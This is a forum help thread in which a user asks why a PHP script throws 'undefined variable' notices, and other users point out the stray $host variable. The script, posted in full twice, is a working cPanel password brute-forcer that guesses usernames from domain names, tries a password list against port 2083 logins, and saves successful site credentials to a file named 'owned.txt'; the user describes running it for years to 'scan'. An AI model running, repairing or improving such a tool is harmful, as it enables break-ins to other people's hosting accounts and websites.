PHP Notice: Undefined variable: host in /dev/shm/mail on line 95

tarajaqan · April 17, 2017, 3:59pm

Am not really good at coding but i recently started having this issue… my scanner bring this notice

PHP Notice:  Undefined variable: host in /dev/shm/mail on line 95
PHP Notice:  Undefined variable: host in /dev/shm/mail on line 97

I dont know if the php version of my root is not working with my script but its the same script i have been using for the past 2 years. below is the full script.

(
#!/usr/bin/php -q
<?php
set_time_limit(0);
function pass_site($site)
	{
			$curl = curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
			curl_setopt($curl,CURLOPT_URL,$site);
			curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
			curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
			curl_setopt($curl,CURLOPT_TIMEOUT,7);
			$exec = curl_exec($curl);
			$info = curl_getinfo($curl);
			
			if($info['http_code'] != 0)
			{
			return true;
			}
			else
			{
			return false;
			}
	
	}
function make_username($site)
	{
		

			if(eregi('https://',$site)) $site  = str_replace("https://","",$site);
			if(!eregi('www',$site))	   $site  = "www.".$site;
			
			
			$site	=	explode(".",$site);
			$site	= str_replace("-","",$site[1]);
			
			$username = substr($site,0,8);
			
			
			return $username;
	}
function post($site,$user,$pass)
	{
			$curl = curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
			curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
			curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
			curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
			curl_setopt($curl,CURLOPT_TIMEOUT,7);
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
			curl_setopt($curl,CURLOPT_POST,1);
			curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
			$exec = curl_exec($curl);
			return $exec;
	}
$passwords=file_get_contents("passwords.txt");

$site=$argv[1];

if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{ 
$site = "https://$site";
}
$site= $site.":2083";
if(!pass_site($site))
{
die();
}
else {

$username=make_username($site);

$passwords=explode("\n",$passwords);
foreach($passwords as $password){
	if($password!=""){
	$cracked = false;
	
	$password=str_replace("%username%",$username,$password);
	
	$result=post($site,$username,$password);
	
	if(preg_match('/security_token/',$result))
	{
	$cracked = true;
	echo "\e[32m[GOOD}: $site: $username : $password\r\n";
	if(!($_OutFile = fopen("owned.txt", "a"))) ExitF ("Cannot open the log file");
        fputs($_OutFile, "$site,$username,$password\r\n");
	break;
	}
	else
	{
	echo "\033[01;31m[BAD ATTEMPT]\033[0m $site: $username: $password\r\n";
	}
	echo "\033[01;31m[Process]\033[0m $host\r\n";

echo "\033[32m[GOOD]\033[37m $host\r\n";


	
}
}}

)

Please some should help me one how to fix it or do i need to upgrade the php on my root? if yes, kindly give me the command to use. Thanks alot

cpradio · April 17, 2017, 4:02pm

To get rid of the notices, get rid of these two echo statements or update them to use the correct variable $site?

echo "\033[01;31m[Process]\033[0m $host\r\n";
echo "\033[32m[GOOD]\033[37m $host\r\n";

Gandalf · April 17, 2017, 4:04pm

I’m not sure which lines are 95 and 97 - presumably those towards the end where you echo $host. The notice is saying you are using $host without first having assigned it a value. Somewhere you need to set

$host = somevalue;

where somevalue is the default value you want it to have - null, zero, or whatever.

tarajaqan · April 17, 2017, 4:21pm

Please both like which are 95 and 97 are

95- echo “\033[01;31m[Process]\033[0m $host\r\n”;
97- echo “\033[32m[GOOD]\033[37m $host\r\n”;

Like i said i dont really know much about coding i just upload both files and start scanning please kindly check and tell me what to correct below is the complete file

#!/usr/bin/php -q
<?php
set_time_limit(0);
function pass_site($site)
	{
			$curl = curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
			curl_setopt($curl,CURLOPT_URL,$site);
			curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
			curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
			curl_setopt($curl,CURLOPT_TIMEOUT,7);
			$exec = curl_exec($curl);
			$info = curl_getinfo($curl);
			
			if($info['http_code'] != 0)
			{
			return true;
			}
			else
			{
			return false;
			}
	
	}
function make_username($site)
	{
		

			if(eregi('https://',$site)) $site  = str_replace("https://","",$site);
			if(!eregi('www',$site))	   $site  = "www.".$site;
			
			
			$site	=	explode(".",$site);
			$site	= str_replace("-","",$site[1]);
			
			$username = substr($site,0,8);
			
			
			return $username;
	}
function post($site,$user,$pass)
	{
			$curl = curl_init();
			curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
			curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
			curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
			curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
			curl_setopt($curl,CURLOPT_TIMEOUT,7);
			curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
			curl_setopt($curl,CURLOPT_POST,1);
			curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
			$exec = curl_exec($curl);
			return $exec;
	}
$passwords=file_get_contents("passwords.txt");

$site=$argv[1];

if(eregi('http',$site)){
$site = str_replace("http://","https://",$site);
}else{ 
$site = "https://$site";
}
$site= $site.":2083";
if(!pass_site($site))
{
die();
}
else {

$username=make_username($site);

$passwords=explode("\n",$passwords);
foreach($passwords as $password){
	if($password!=""){
	$cracked = false;
	
	$password=str_replace("%username%",$username,$password);
	
	$result=post($site,$username,$password);
	
	if(preg_match('/security_token/',$result))
	{
	$cracked = true;
	echo "\e[32m[GOOD}: $site: $username : $password\r\n";
	if(!($_OutFile = fopen("owned.txt", "a"))) ExitF ("Cannot open the log file");
        fputs($_OutFile, "$site,$username,$password\r\n");
	break;
	}
	else
	{
	echo "\033[01;31m[BAD ATTEMPT]\033[0m $site: $username: $password\r\n";
	}
	echo "\033[01;31m[Process]\033[0m $host\r\n";

echo "\033[32m[GOOD]\033[37m $host\r\n";


	
}
}}

?>

tarajaqan · April 17, 2017, 4:24pm

Please both like which are 95 and 97 are

95- echo “\033[01;31m[Process]\033[0m $host\r\n”;
97- echo “\033[32m[GOOD]\033[37m $host\r\n”;

Mittineague · April 17, 2017, 8:14pm

What is $host supposed to be?

droopsnoot · April 18, 2017, 9:43am

As @cpradio said earlier:

If you look a couple of lines up the code from the two lines giving you trouble, you can see that line uses $site instead of $host.

It’s weird that it has been working but has now started playing up. Is it possible something on the host changed? It’s also interesting that it seems to be outputting what look like Epson printer escape sequences, presumably it’s not running directly in a browser, or do they deal with stuff like that?

system · July 18, 2017, 4:44pm

This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.